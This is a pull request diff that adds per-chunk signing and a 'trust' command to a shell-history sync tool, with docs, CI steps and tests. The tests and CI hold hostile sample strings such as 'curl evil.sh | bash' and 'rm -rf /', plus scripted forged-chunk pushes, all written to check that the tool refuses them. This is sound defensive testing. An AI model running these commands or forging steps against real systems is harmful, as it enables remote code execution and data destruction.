### PR TITLE
Authenticate synced chunks so a repo you can push to cannot inject commands

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -79,7 +79,9 @@ jobs:
         with:
           python-version: "3.12"
       - run: sudo apt-get update -qq && sudo apt-get install -y -qq age
-      - run: age --version && git --version
+      # ssh-keygen signs every chunk. It ships with ubuntu-latest, but assert it
+      # rather than assume: an unsigned chunk is one no other machine accepts.
+      - run: age --version && git --version && ssh-keygen -Y sign -h 2>&1 | head -1
       - name: sync suite
         run: |
           set -o pipefail

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -88,7 +88,9 @@ jobs:
           python -m unittest tests.test_sync --verbose 2>&1 | tee sync.log
           # These tests skip themselves when age or git is absent. A skipped run
           # is green, which is precisely the failure mode worth guarding.
-          if grep -q "skipped" sync.log; then
+          # The summary line, not the bare word: a test *docstring* containing
+          # "skipped" used to redden this build.
+          if grep -qE "^(OK|FAILED) \(.*skipped=" sync.log; then
             echo "::error::sync tests were skipped - age or git missing"
             exit 1
           fi
@@ -179,5 +181,27 @@ jobs:
           # who can read the history on an assumed answer.
           run_as alpha grant --yes
           run_as alpha sync
+          # beta fetches alpha's signing key with this sync, then pins it.
+          # --yes for the same reason grant needs it: no terminal here.
+          run_as beta sync
+          run_as beta trust --yes
           run_as beta sync
           run_as beta list --scope global | grep -q 'secret-marker-command'
+
+          # And the point of the pin: a chunk alpha did not sign is refused.
+          # Sealed to alpha's published day key, which is in the clear on
+          # purpose, so this is exactly what a push-capable attacker can build
+          # with nothing but push access and the repo's own contents.
+          ATTACK="$BASE/attacker"
+          git clone --quiet "$BASE/origin.git" "$ATTACK"
+          DAY_PUB=$(cat "$ATTACK/hosts/$ALPHA_ID/keys/2023-11-14.pub")
+          printf '1700000009\ts1\t~\t0\t5\tforged-marker-command\n' \
+            | python3 -c 'import sys,zlib; sys.stdout.buffer.write(zlib.compress(sys.stdin.buffer.read(),9))' \
+            | age -r "$DAY_PUB" \
+            > "$ATTACK/hosts/$ALPHA_ID/2023-11-14/9999999999-ffffff.age"
+          git -C "$ATTACK" add -A
+          git -C "$ATTACK" -c user.name=x -c user.email=x@y commit -q -m 'woswoar sync'
+          git -C "$ATTACK" push --quiet origin HEAD
+
+          run_as beta sync
+          ! run_as beta list --scope global | grep -q 'forged-marker-command'

--- a/README.md
+++ b/README.md
@@ -83,6 +83,28 @@ Grant all 2 machines full access? [y/N]
 No rush — until you run it the new machine syncs its own commands normally and
 just reports how many older days it cannot read yet.
 
+Then, on each machine that should *read* the newcomer's history, accept its
+signing key once:
+
+```bash
+woswoar trust
+```
+
+Every chunk is signed by the machine that wrote it, and a machine only merges
+history from signing keys it has accepted — so a repo anyone can push to cannot
+put a command into your Ctrl-R. `woswoar trust` shows each new machine's name
+and key fingerprint and asks before pinning it:
+
+```
+These machines publish history you are not currently merging:
+
+  martin@work-laptop
+    id          7f3a9c2138ab04e1
+    signing key SHA256:L4EM9cgvQHKsUnQIpSx87+XDv3eubJTpiDptC4i2jzo
+
+Trust these 1 machine(s)? [y/N]
+```
+
 > [!TIP]
 > `.bashrc` is written with `$HOME` rather than your username, so one shared
 > dotfiles `.bashrc` works on every machine.

--- a/docs/security.md
+++ b/docs/security.md
@@ -31,6 +31,44 @@ perfectly and still not open `~/.ssh`; see
 [the design summary](woswoar_design_summary.md#age-never-gets-a-path) for the
 incident that established the rule.
 
+## ✍️ Every line is signed by the machine that wrote it
+
+Encryption answers *"who may read this?"*. It does not answer *"who wrote
+this?"* — age has no notion of a sender, and the recipient list is published in
+the repo, so on its own **anyone who can push could seal a chunk every machine
+would happily open and show you in Ctrl-R**. A history entry is one keypress
+from being executed, so that gap mattered.
+
+So each machine also has an ed25519 **signing key**, and every chunk carries a
+detached `ssh-keygen -Y sign` signature over its ciphertext. Verification runs
+*before* anything is decrypted, so a chunk a machine did not write is never
+opened at all.
+
+The key each host is held to is pinned locally the first time you accept it —
+in `state.json`, which is the one thing the remote cannot rewrite. Adding a
+machine therefore takes one confirmation on the machines that will read it:
+
+```bash
+woswoar trust      # shows each new machine's name and key fingerprint, and asks
+```
+
+If a host's published signing key ever stops matching the pinned one, sync
+refuses that host's history and says so rather than guessing which of the two
+is real.
+
+<details>
+<summary>What this does and does not stop</summary>
+
+Stopped: anyone with push access to the repo — a stolen token, a mis-scoped
+deploy key, the git host itself — fabricating history, or tampering with a
+machine's existing history.
+
+Not stopped: a machine you have already trusted, whose private key has been
+stolen, publishing whatever it likes under its own name. Signing establishes
+*which machine* wrote something, not that the machine is behaving.
+
+</details>
+
 ## 🔑 No secret is ever copied between machines
 
 age takes **SSH public keys as recipients**, so each machine encrypts to the
@@ -71,6 +109,10 @@ Claims rot. The ones that matter are asserted in CI on every push:
 | Shell and Python escaping agree | a command containing a literal tab and newline must round-trip byte-for-byte |
 | History is never rewritten | `git log --diff-filter=MD` over chunk files must be **empty** |
 | age is never given a file path | every age invocation is inspected; no argument may be an existing path outside `/dev/fd` |
+| Forged history is refused | a chunk sealed to a host's published day key, but unsigned, is rejected and reported |
+| An untrusted machine is ignored | a fabricated host directory is skipped before its chunks are opened |
+| A swapped signing key is refused | republishing `signer.pub` does not re-authorise anything |
+| A recalled command is one command | control characters never survive from the picker into the shell buffer |
 | The repo does not blow up | a simulated multi-day, multi-machine run is measured after `git gc` |
 | Search stays fast | latency measured on 52,000 entries |
 
@@ -85,6 +127,10 @@ Being straight about the limits is part of the security story:
 >   encryption for that.
 > - **Metadata leaks.** Anyone with the repo can see how many machines you have,
 >   when they synced, and roughly how many commands you ran per day.
+> - **Trust is first-use.** The first time you accept a machine, you accept
+>   whatever key the repo shows you. Compare the fingerprint `woswoar trust`
+>   prints against the one on the machine itself if the repo is somewhere you
+>   do not fully control.
 > - **Secrets you type are still secrets.** `WOSWOAR_IGNORE` skips
 >   credential-shaped commands by default (`*TOKEN=`, `*SECRET=`, `--password`,
 >   …), and bash's own `HISTCONTROL`/`HISTIGNORE` are honoured for free — but no

--- a/docs/woswoar_design_summary.md
+++ b/docs/woswoar_design_summary.md
@@ -629,6 +629,15 @@ deflate to *more* than they started as — a one-line chunk is 42 B and becomes
 47 — so the smaller form wins and the tag records which, at a cost of one byte
 on data that already carries a 200 B age header.
 
+**Cost: a signature per chunk.** Each chunk also carries the armoured
+`ssh-keygen -Y sign` block that proves which machine wrote it — a fixed 306 B,
+in front of the ciphertext in the same file. That is more than a small chunk's
+own payload, so the per-chunk overhead roughly doubles; it buys the property
+that no chunk a machine did not sign is ever opened, and a header rather than a
+sibling `.sig` keeps the file count, the `*.age` gitattributes glob and the
+"no chunk is ever rewritten" invariant all working unchanged. `compact` is the
+lever if the bytes matter: one signature per day instead of one per sync.
+
 **Cost: inodes.** At a 5-minute timer and ~40 content-bearing syncs a day, one
 machine produces ~35k chunk files over two years. Git copes, but a fresh clone
 writes a lot of small files. An opt-in `woswoar compact` merges a completed past

--- a/tests/test_deps.py
+++ b/tests/test_deps.py
@@ -107,14 +107,14 @@ class TestInstallWarnsAboutMissingTools(WoswoarTestCase):
         # failure -- the hook really was installed.
         self.assertEqual(code, 0)
         self.assertIn("woswoar.bash", out.getvalue())
-        for tool in ("fzf", "age", "git"):
+        for tool in ("fzf", "age", "git", "ssh-keygen"):
             self.assertIn(tool, err.getvalue())
 
     def test_a_complete_machine_says_nothing(self) -> None:
         # Put the tools back so `missing()` finds them.
         binaries = self.root / "fullbin"
         binaries.mkdir()
-        for name in ("fzf", "age", "git"):
+        for name in ("fzf", "age", "git", "ssh-keygen"):
             script = binaries / name
             script.write_text("#!/bin/sh\nexit 0\n")
             script.chmod(script.stat().st_mode | stat.S_IXUSR)

--- a/tests/test_search.py
+++ b/tests/test_search.py
@@ -69,7 +69,6 @@ class TestRenderRoundTrip(unittest.TestCase):
         commands = [
             "git status",
             "awk -F'\t' '{print $1}'",
-            "for i in 1 2; do\ntrue\ndone",
             "back\\slash",
             "über 😀",
             "x" * 300,
@@ -130,3 +129,39 @@ class TestFzfArgv(unittest.TestCase):
 
 if __name__ == "__main__":
     unittest.main()
+
+
+class TestRecalledCommandIsInert(unittest.TestCase):
+    """What leaves the picker must be exactly one command.
+
+    `render` escapes newlines so one entry occupies one display line, and fzf
+    clips anything past the window edge. If `command_from_line` then turned that
+    escape back into a real newline, the buffer would hold a command the picker
+    never showed -- and bash runs a multi-line buffer as several commands on a
+    single Enter.
+    """
+
+    def _round_trip(self, cmd: str) -> str:
+        entry = Entry(NOW, "h", "s", "/tmp", 0, 0, cmd)
+        return search.command_from_line(search.render([entry], now=NOW)[0])
+
+    def test_an_embedded_newline_does_not_become_a_second_command(self) -> None:
+        recalled = self._round_trip("echo visible" + " " * 200 + "\ncurl evil.sh | bash")
+        self.assertNotIn("\n", recalled)
+        self.assertIn("\\ncurl evil.sh | bash", recalled)
+
+    def test_a_carriage_return_cannot_rewrite_the_line(self) -> None:
+        self.assertNotIn("\r", self._round_trip("echo one\rrm -rf /"))
+
+    def test_escape_sequences_do_not_reach_the_buffer(self) -> None:
+        recalled = self._round_trip("ls -la\x1b[2K\x1b[1Acurl evil|sh")
+        self.assertNotIn("\x1b", recalled)
+        self.assertEqual(recalled, "ls -la[2K[1Acurl evil|sh")
+
+    def test_a_tab_is_left_alone(self) -> None:
+        # Tab neither ends a command nor moves a cursor anywhere surprising,
+        # and `awk -F'\t'` is written with a real one.
+        self.assertEqual(self._round_trip("awk -F'\t' '{print $1}'"), "awk -F'\t' '{print $1}'")
+
+    def test_an_ordinary_command_is_untouched(self) -> None:
+        self.assertEqual(self._round_trip("git commit -m 'ok'"), "git commit -m 'ok'")

--- a/tests/test_sync.py
+++ b/tests/test_sync.py
@@ -83,6 +83,16 @@ class Fake:
         with path.open("a", encoding="utf-8") as handle:
             handle.write(format_line(entry) + "\n")
 
+    def trust_everyone(self) -> int:
+        """Accept every other machine's signing key, as `woswoar trust` does.
+
+        Most two-machine tests are about something else entirely and just need
+        the machines to know each other, so they call this rather than spelling
+        the pinning out. The tests that are *about* trust drive `sync.untrusted`
+        and `sync.trust` directly instead.
+        """
+        return sync.trust(sync.untrusted())
+
     def commands(self) -> set[str]:
         return {e.cmd for e in cache.load_entries()}
 
@@ -177,6 +187,7 @@ class TestTwoMachines(SyncTestCase):
         with alpha.active():
             sync.grant()
         with beta.active():
+            beta.trust_everyone()
             report = sync.run()
             self.assertEqual(report.chunks_merged, 1)
             self.assertEqual(beta.commands(), {"git status", "make -j8"})
@@ -203,6 +214,8 @@ class TestTwoMachines(SyncTestCase):
 
         with beta.active():
             sync.run()
+            beta.trust_everyone()
+            sync.run()
             self.assertEqual(beta.commands(), {"git status"})
 
     def test_a_new_machine_cannot_reencrypt_for_itself(self) -> None:
@@ -220,6 +233,7 @@ class TestTwoMachines(SyncTestCase):
         beta = self.machine("beta")
         with beta.active():
             sync.run()
+            beta.trust_everyone()
             report = sync.grant()
             # It re-seals what it owns -- its own name seal -- and skips
             # alpha's day key, so it still cannot read alpha's history.
@@ -235,6 +249,8 @@ class TestTwoMachines(SyncTestCase):
 
         beta = self.machine("beta")
         with beta.active():
+            sync.run()
+            beta.trust_everyone()
             beta.record("2023-11-15", 1_700_100_000, "beta's own command")
             report = sync.run()
             # Unreadable history must not stop this machine exporting its own.
@@ -251,7 +267,11 @@ class TestTwoMachines(SyncTestCase):
         with beta.active():
             beta.record("2023-11-14", 1_700_000_050, "from beta")
             sync.run()
+            beta.trust_everyone()
+            sync.run()
         with alpha.active():
+            sync.run()
+            alpha.trust_everyone()
             sync.run()
             self.assertEqual(alpha.commands(), {"from alpha", "from beta"})
         with beta.active():
@@ -267,7 +287,10 @@ class TestTwoMachines(SyncTestCase):
             sync.grant()
         with beta.active():
             sync.run()
+            beta.trust_everyone()
+            sync.run()
             first = len(cache.load_entries())
+            self.assertEqual(first, 1, "nothing merged, so idempotence is untested")
             for _ in range(3):
                 sync.run()
             self.assertEqual(len(cache.load_entries()), first, "re-sync duplicated entries")
@@ -280,6 +303,7 @@ class TestTwoMachines(SyncTestCase):
             sync.grant()
         with beta.active():
             sync.run()
+            beta.trust_everyone()
 
         with alpha.active():
             for day, ts in (("2023-11-14", 1_700_000_001), ("2023-11-15", 1_700_100_000)):
@@ -302,6 +326,8 @@ class TestTwoMachines(SyncTestCase):
             sync.grant()
         with beta.active():
             sync.run()
+            beta.trust_everyone()
+            sync.run()
             # Without this, search would label alpha's entries with its opaque id.
             self.assertEqual(store.host_names().get(alpha.id), "alpha@laptop")
 
@@ -314,6 +340,8 @@ class TestTwoMachines(SyncTestCase):
             sync.grant()
         with beta.active():
             beta.record("2023-11-14", 1_700_000_050, "from beta")
+            sync.run()
+            beta.trust_everyone()
             sync.run()
             entries = cache.load_entries()
             self.assertEqual(len(search.filter_scope(entries, "global")), 2)
@@ -575,6 +603,8 @@ class TestCompact(SyncTestCase):
             sync.grant()
         with beta.active():
             sync.run()
+            beta.trust_everyone()
+            sync.run()
             self.assertEqual(beta.commands(), {"command 0", "command 1", "command 2"})
 
 
@@ -637,3 +667,189 @@ class TestLocalOnly(SyncTestCase):
 
 if __name__ == "__main__":
     unittest.main()
+
+
+class TestChunkAuthenticity(SyncTestCase):
+    """Who wrote a chunk, which age alone cannot answer.
+
+    `recipients.txt` publishes every machine's public key and each day's public
+    key sits in the clear beside its sealed half, so anyone who can push to the
+    repo can seal a chunk that every machine is able to *open*. These pin that
+    being able to open it is not the same as being willing to believe it.
+    """
+
+    def push_as_attacker(self, write: object) -> None:
+        """Do what someone with push access -- and nothing else -- can do.
+
+        Goes through a separate clone and a real push rather than writing into a
+        machine's working tree, because that is the actual attacker position:
+        no identity, no signing key, only the repo.
+        """
+        work = self.root / "attacker"
+        if not work.exists():
+            subprocess.run(
+                ["git", "clone", "--quiet", str(self.origin), str(work)], check=True, timeout=60
+            )
+        else:
+            subprocess.run(["git", "-C", str(work), "pull", "--quiet"], check=True, timeout=60)
+        write(work)  # type: ignore[operator]
+        for args in (
+            ["add", "-A"],
+            ["-c", "user.name=x", "-c", "user.email=x@y", "commit", "-q", "-m", "woswoar sync"],
+            ["push", "--quiet", "origin", "HEAD"],
+        ):
+            subprocess.run(["git", "-C", str(work), *args], check=True, timeout=60)
+
+    @staticmethod
+    def forged_chunk(work: Path, host_id: str, day: str, cmd: str) -> None:
+        """A chunk sealed to a host's *published* day key, signed by nobody."""
+        pub = (work / "hosts" / host_id / "keys" / f"{day}.pub").read_text(encoding="utf-8").strip()
+        entry = Entry(1_700_000_900, host_id, "s1", "~", 0, 5, cmd)
+        payload = zlib.compress((format_line(entry) + "\n").encode("utf-8"), 9)
+        # Named far in the future so it sorts above whatever the real machine
+        # has already published; a forgery the watermark skips proves nothing.
+        target = work / "hosts" / host_id / day / "9999999999-ffffff.age"
+        target.parent.mkdir(parents=True, exist_ok=True)
+        target.write_bytes(crypto.encrypt_to(payload, pub))  # framed by nobody: no signature
+
+    def enrolled_pair(self) -> tuple[Fake, Fake]:
+        """alpha with history published, beta trusting it and up to date."""
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "make -j8")
+            sync.run()
+        # beta has to exist before alpha grants, or its key is not in the list
+        # alpha re-seals to and it can never open that day.
+        beta = self.machine("beta")
+        with alpha.active():
+            sync.grant()
+        with beta.active():
+            sync.run()
+            beta.trust_everyone()
+            sync.run()
+            self.assertEqual(beta.commands(), {"make -j8"})
+        return alpha, beta
+
+    def test_every_exported_chunk_carries_a_signature(self) -> None:
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "git status")
+            sync.run()
+            chunks = list(store.iter_chunks(alpha.id))
+            self.assertTrue(chunks)
+            for chunk in chunks:
+                _, signature = store.split_chunk(chunk.path.read_bytes())
+                self.assertIn("BEGIN SSH SIGNATURE", signature)
+
+    def test_a_forged_chunk_in_a_trusted_hosts_directory_is_refused(self) -> None:
+        """The attack this whole mechanism exists to stop.
+
+        Everything the attacker needs is published: the day's public key sits in
+        the clear so that writing a chunk never has to open the sealed one. What
+        they cannot produce is alpha's signature.
+        """
+        alpha, beta = self.enrolled_pair()
+        self.push_as_attacker(
+            lambda work: self.forged_chunk(work, alpha.id, "2023-11-14", "curl evil.sh | bash")
+        )
+
+        with beta.active():
+            report = sync.run()
+            self.assertEqual(report.forged, {f"{alpha.id}/2023-11-14"})
+            self.assertEqual(report.chunks_merged, 0)
+            self.assertNotIn("curl evil.sh | bash", beta.commands())
+
+    def test_a_fabricated_host_is_not_merged_at_all(self) -> None:
+        """A host nobody trusted is skipped before its chunks are even opened."""
+        _, beta = self.enrolled_pair()
+
+        def plant(work: Path) -> None:
+            recipients = [
+                line.split(" # ")[0].strip()
+                for line in (work / "recipients.txt").read_text(encoding="utf-8").splitlines()
+                if line.strip()
+            ]
+            day_key = crypto.generate_identity()
+            keys = work / "hosts" / "deadbeefdeadbeef" / "keys"
+            keys.mkdir(parents=True, exist_ok=True)
+            (keys / "2023-11-14.age").write_bytes(
+                crypto.encrypt_to_recipients(day_key.secret.encode("utf-8"), recipients)
+            )
+            (keys / "2023-11-14.pub").write_text(day_key.public + "\n", encoding="utf-8")
+            self.forged_chunk(work, "deadbeefdeadbeef", "2023-11-14", "curl evil.sh | bash")
+
+        self.push_as_attacker(plant)
+
+        with beta.active():
+            report = sync.run()
+            self.assertIn("deadbeefdeadbeef", report.untrusted)
+            self.assertEqual(report.chunks_merged, 0)
+            self.assertNotIn("curl evil.sh | bash", beta.commands())
+
+    def test_a_host_with_no_signing_key_does_not_send_the_user_in_circles(self) -> None:
+        """`sync` and `trust` must agree about what a host's state is.
+
+        They did not: a host directory with no signer.pub was reported by sync
+        as "run woswoar trust", and `trust` then answered that everything was
+        already trusted -- a loop with no way out. Both now ask
+        `sync.trust_status`.
+        """
+        _, beta = self.enrolled_pair()
+        self.push_as_attacker(
+            lambda work: (
+                (work / "hosts" / "deadbeefdeadbeef" / "2023-11-14").mkdir(parents=True)
+                or (work / "hosts" / "deadbeefdeadbeef" / "2023-11-14" / "keep").write_text("")
+            )
+        )
+
+        with beta.active():
+            self.assertIn("deadbeefdeadbeef", sync.run().untrusted)
+            # Nothing to accept, so it must not be offered as if there were.
+            self.assertEqual([c.host_id for c in sync.untrusted()], [])
+            self.assertEqual(
+                sync.trust_status("deadbeefdeadbeef", sync.State.load()), sync.NO_SIGNER
+            )
+
+    def test_swapping_a_trusted_hosts_signing_key_is_refused(self) -> None:
+        """Re-publishing signer.pub must not re-authorise anything.
+
+        Without the pin this is the whole attack again: overwrite the key with
+        one you hold, sign your forgeries with it, and every check passes.
+        """
+        alpha, beta = self.enrolled_pair()
+        attacker_key = crypto.generate_signing_key()
+
+        def swap(work: Path) -> None:
+            (work / "hosts" / alpha.id / "signer.pub").write_text(
+                attacker_key.public + "\n", encoding="utf-8"
+            )
+
+        self.push_as_attacker(swap)
+
+        with beta.active():
+            report = sync.run()
+            self.assertEqual(report.changed_signer, {alpha.id})
+            self.assertEqual(report.chunks_merged, 0)
+
+    def test_trusting_a_machine_is_what_lets_its_history_through(self) -> None:
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "make -j8")
+            sync.run()
+        beta = self.machine("beta")
+        with alpha.active():
+            sync.grant()
+
+        with beta.active():
+            self.assertIn(alpha.id, sync.run().untrusted)
+            self.assertEqual(beta.commands(), set())
+
+            candidates = sync.untrusted()
+            self.assertEqual([c.host_id for c in candidates], [alpha.id])
+            self.assertTrue(candidates[0].fingerprint.startswith("SHA256:"))
+            self.assertEqual(candidates[0].replaces, "")
+
+            sync.trust(candidates)
+            sync.run()
+            self.assertEqual(beta.commands(), {"make -j8"})
+            self.assertEqual(sync.untrusted(), [])

--- a/woswoar/__main__.py
+++ b/woswoar/__main__.py
@@ -48,6 +48,27 @@ def portable_hook_path(target: Path) -> str:
         return str(target)
 
 
+def confirm(question: str, refusal: str, yes: bool) -> bool:
+    """Ask before widening what a machine can read or run.
+
+    Shared by `grant` and `trust`, which are the two commands that change who
+    is believed. Both need the same non-tty rule: `sync` runs unattended from a
+    timer, so a prompt nobody can answer must refuse rather than block.
+    """
+    if yes:
+        return True
+    if not sys.stdin.isatty():
+        print(
+            f"\nRefusing to {refusal} without confirmation. Re-run with --yes if you mean it.",
+            file=sys.stderr,
+        )
+        return False
+    if input(f"\n{question} [y/N] ").strip().lower() not in ("y", "yes"):
+        print("Nothing changed.")
+        return False
+    return True
+
+
 def cmd_install(args: argparse.Namespace) -> int:
     """Set up machine identity, install the hook, and wire up .bashrc."""
     import shutil
@@ -233,6 +254,15 @@ def cmd_doctor(args: argparse.Namespace) -> int:
         for line in failure.splitlines():
             print(f"     {line}")
 
+    signer_path = shutil.which("ssh-keygen")
+    if signer_path is None:
+        info("signing", f"not found, needed for 'woswoar sync' - {deps.advice([deps.SSH_KEYGEN])}")
+    else:
+        failure = crypto.signing_selftest()
+        check("signing", not failure, signer_path)
+        for line in failure.splitlines():
+            print(f"     {line}")
+
     # Checked whether or not a repo exists: `init` is exactly when this breaks,
     # and gating it behind is_repo() meant doctor was silent in the one state
     # where someone would think to run it.
@@ -249,6 +279,23 @@ def cmd_doctor(args: argparse.Namespace) -> int:
 
     if sync.is_repo():
         info("remote", sync.remote_summary())
+        # Through sync.trust_status, not a hand-rolled "is it in signers?":
+        # membership alone reported a host whose key had *changed* as trusted,
+        # which is the one state doctor exists to surface.
+        state = sync.State.load()
+        others = [h for h in store.repo_hosts() if h != store.machine().id]
+        by_status = Counter(sync.trust_status(h, state) for h in others)
+        check(
+            "signers",
+            not by_status[sync.KEY_CHANGED],
+            f"{by_status[sync.KEY_CHANGED]} machine(s) publish a different signing key"
+            " than the one trusted here"
+            if by_status[sync.KEY_CHANGED]
+            else f"{by_status[sync.TRUSTED]} other machine(s) trusted",
+        )
+        waiting = by_status[sync.UNTRUSTED] + by_status[sync.NO_SIGNER]
+        if waiting:
+            info("trust", f"{waiting} machine(s) not trusted yet - run 'woswoar trust'")
     else:
         info("sync", "no history repo - run 'woswoar init <url>' to sync machines")
 
@@ -314,6 +361,65 @@ def cmd_sync(args: argparse.Namespace) -> int:
             "then sync here again. Nothing is lost in the meantime.",
             file=sys.stderr,
         )
+
+    if report.untrusted:
+        count = len(report.untrusted)
+        print(
+            f"\n{count} machine(s) in the repo have not been trusted here, so their\n"
+            "history was not merged. Review and accept them with:\n"
+            "    woswoar trust",
+            file=sys.stderr,
+        )
+
+    if report.changed_signer:
+        # Loud and unresolved on purpose. This is the shape an attack takes, and
+        # the honest answer is that woswoar cannot tell it from a re-enrolment.
+        print(
+            f"\nWARNING: {len(report.changed_signer)} machine(s) now publish a different\n"
+            "signing key than the one trusted here. Their history was refused. If you\n"
+            "re-enrolled that machine this is expected - run 'woswoar trust' to accept\n"
+            "the new key. If you did not, someone else can write to your history repo.",
+            file=sys.stderr,
+        )
+
+    if report.forged:
+        print(
+            f"\nWARNING: {len(report.forged)} day(s) of history carried a missing or bad\n"
+            "signature and were refused. Chunks are signed by the machine that wrote\n"
+            "them, so this means the repo contains data that machine did not write.",
+            file=sys.stderr,
+        )
+    return 0
+
+
+def cmd_trust(args: argparse.Namespace) -> int:
+    """Accept other machines' signing keys, so their history is merged."""
+    from . import sync
+
+    candidates = sync.untrusted()
+    if not candidates:
+        print("Every machine in the repo is already trusted here.")
+        return 0
+
+    print("These machines publish history you are not currently merging:\n")
+    for candidate in candidates:
+        print(f"  {candidate.label}")
+        print(f"    id          {candidate.host_id}")
+        print(f"    signing key {candidate.fingerprint}")
+        if candidate.replaces:
+            print("    NOTE        this REPLACES a different key you trusted before.")
+            print("                Expected only if you re-enrolled that machine.")
+        print()
+    print(
+        "Trusting a machine means running the commands it publishes is one\n"
+        "keypress away in Ctrl-R. Only accept keys you can confirm out of band."
+    )
+
+    if not confirm(f"Trust these {len(candidates)} machine(s)?", "trust machines", args.yes):
+        return 1
+
+    count = sync.trust(candidates)
+    print(f"\ntrusted {count} machine(s); run 'woswoar sync' to merge their history")
     return 0
 
 
@@ -340,20 +446,8 @@ def cmd_grant(args: argparse.Namespace) -> int:
         "\npublishes them. Nothing is decrypted, and nothing else is re-uploaded."
     )
 
-    if not args.yes:
-        if not sys.stdin.isatty():
-            print(
-                "\nRefusing to grant access without confirmation. "
-                "Re-run with --yes if you mean it.",
-                file=sys.stderr,
-            )
-            return 1
-        if input(f"\nGrant all {len(keys)} machines full access? [y/N] ").strip().lower() not in (
-            "y",
-            "yes",
-        ):
-            print("Nothing changed.")
-            return 1
+    if not confirm(f"Grant all {len(keys)} machines full access?", "grant access", args.yes):
+        return 1
 
     report = sync.grant(confirmed=keys)
     print(f"\nre-sealed {report.resealed} key file(s)")
@@ -461,6 +555,12 @@ def build_parser() -> argparse.ArgumentParser:
     )
     p_grant.add_argument("--yes", action="store_true", help="skip the confirmation prompt")
     p_grant.set_defaults(func=cmd_grant)
+
+    p_trust = subparsers.add_parser(
+        "trust", help="accept another machine's signing key so its history merges"
+    )
+    p_trust.add_argument("--yes", action="store_true", help="skip the confirmation prompt")
+    p_trust.set_defaults(func=cmd_trust)
 
     p_compact = subparsers.add_parser("compact", help="merge old chunks (reduces file count)")
     p_compact.add_argument("--before", help="only days before this YYYY-MM-DD (default: today)")

--- a/woswoar/crypto.py
+++ b/woswoar/crypto.py
@@ -1,4 +1,4 @@
-"""Encryption, delegated entirely to the ``age`` binary.
+"""Encryption and signing, delegated entirely to ``age`` and ``ssh-keygen``.
 
 Python's standard library has no cipher -- only hashing and randomness -- so
 sealing the synced history needs an external tool. ``age`` was chosen because it
@@ -6,8 +6,15 @@ is one small static binary and it accepts **SSH public keys as recipients**,
 which means each machine can use the keypair it already pushes to git with and
 no secret ever has to be copied between machines.
 
+``age`` gives confidentiality and nothing else: it has no notion of a sender, so
+a recipient list published in the repo lets *anyone who can push* seal a chunk
+that every machine will happily open. Authenticity therefore needs a second
+primitive, and ``ssh-keygen -Y sign``/``-Y verify`` is it -- OpenSSH's signature
+mode, which is as much a "one job, already audited, already installed" tool as
+age is. Same rule as encryption: no primitive is composed here, only invoked.
+
 Nothing here knows about history, chunks, or git; it is a thin, testable seam so
-that swapping the backend later touches one file.
+that swapping either backend later touches one file.
 """
 
 from __future__ import annotations
@@ -15,6 +22,7 @@ from __future__ import annotations
 import os
 import shutil
 import subprocess
+import tempfile
 from collections.abc import Iterable
 from pathlib import Path
 from typing import NamedTuple
@@ -23,6 +31,13 @@ from .errors import WoswoarError
 
 AGE = "age"
 AGE_KEYGEN = "age-keygen"
+SSH_KEYGEN = "ssh-keygen"
+
+#: Domain separator for chunk signatures. ssh-keygen refuses a signature made
+#: for a different namespace, so a signature harvested from some other use of
+#: the same key -- git commit signing, `ssh-keygen -Y sign` in a script -- can
+#: never be replayed as a woswoar chunk.
+CHUNK_NAMESPACE = "woswoar-chunk"
 
 _TIMEOUT = 120
 
@@ -74,6 +89,17 @@ def require() -> None:
 
 def _run(argv: list[str], data: bytes | None = None, pass_fds: tuple[int, ...] = ()) -> bytes:
     require()
+    return _spawn(argv, data, pass_fds)
+
+
+def _spawn(argv: list[str], data: bytes | None = None, pass_fds: tuple[int, ...] = ()) -> bytes:
+    """Run a tool and return its stdout, raising :class:`AgeError` on failure.
+
+    Split out from :func:`_run` so the ssh-keygen calls below do not assert that
+    *age* is installed: signing and encryption are separate tools, and reporting
+    a missing age when ssh-keygen is what is absent sends the reader to the
+    wrong package.
+    """
     try:
         result = subprocess.run(
             argv,
@@ -182,6 +208,161 @@ def recipient_for(identity: Path) -> str:
     # both how to skip the subprocess when the identity carries its own
     # `# public key:` comment and how to feed age on stdin when it does not.
     return public_of(identity.read_text(encoding="utf-8"))
+
+
+# ---------------------------------------------------------------------------
+# Signing. Answers "who wrote this?", which age cannot.
+# ---------------------------------------------------------------------------
+
+
+def signing_available() -> bool:
+    return shutil.which(SSH_KEYGEN) is not None
+
+
+def require_signing() -> None:
+    if not signing_available():
+        from . import deps
+
+        raise AgeError(
+            "Sync verifies who wrote every chunk before opening it.\n"
+            + deps.report([deps.SSH_KEYGEN])
+        )
+
+
+def generate_signing_key() -> Identity:
+    """Create a fresh unencrypted ed25519 signing keypair.
+
+    Every machine gets a dedicated signing key rather than reusing whichever
+    identity `sync.choose_identity` picked. That identity may be an *age* key,
+    which is X25519 and cannot sign at all, so reuse would work on some machines
+    and fail on others -- one code path that always works beats a branch that
+    only mostly does.
+
+    ssh-keygen can only write a keypair to a path, so this generates into a
+    private temporary directory and hands back the bytes. Storing it is the
+    caller's business, which keeps the "no key material is written by this
+    module" property the encryption half already has.
+    """
+    require_signing()
+    with tempfile.TemporaryDirectory(prefix="woswoar-key-") as scratch:
+        path = Path(scratch) / "signing_key"
+        _spawn(
+            [SSH_KEYGEN, "-q", "-t", "ed25519", "-N", "", "-C", "woswoar", "-f", str(path)],
+        )
+        return Identity(
+            secret=path.read_text(encoding="utf-8"),
+            public=path.with_suffix(".pub").read_text(encoding="utf-8").strip(),
+        )
+
+
+def public_of_signing_key(key: Path) -> str:
+    """Recover a signing key's public half from the private key file."""
+    require_signing()
+    return _spawn([SSH_KEYGEN, "-y", "-f", str(key)]).decode("utf-8").strip()
+
+
+def sign(data: bytes, key: Path) -> str:
+    """Sign ``data`` with the signing key at ``key``, returning armoured text.
+
+    Takes a path, unlike everything on the encryption side, and the exception is
+    forced rather than chosen: ``ssh-keygen -Y sign`` resolves the ``.pub``
+    sibling of whatever ``-f`` names, so handing it ``/dev/fd/N`` fails with
+    "Couldn't load public key" -- the trick that works for age does not work
+    here. The cost is small, because this key is woswoar's own file in its own
+    config directory rather than something in ``~/.ssh`` a sandboxed binary may
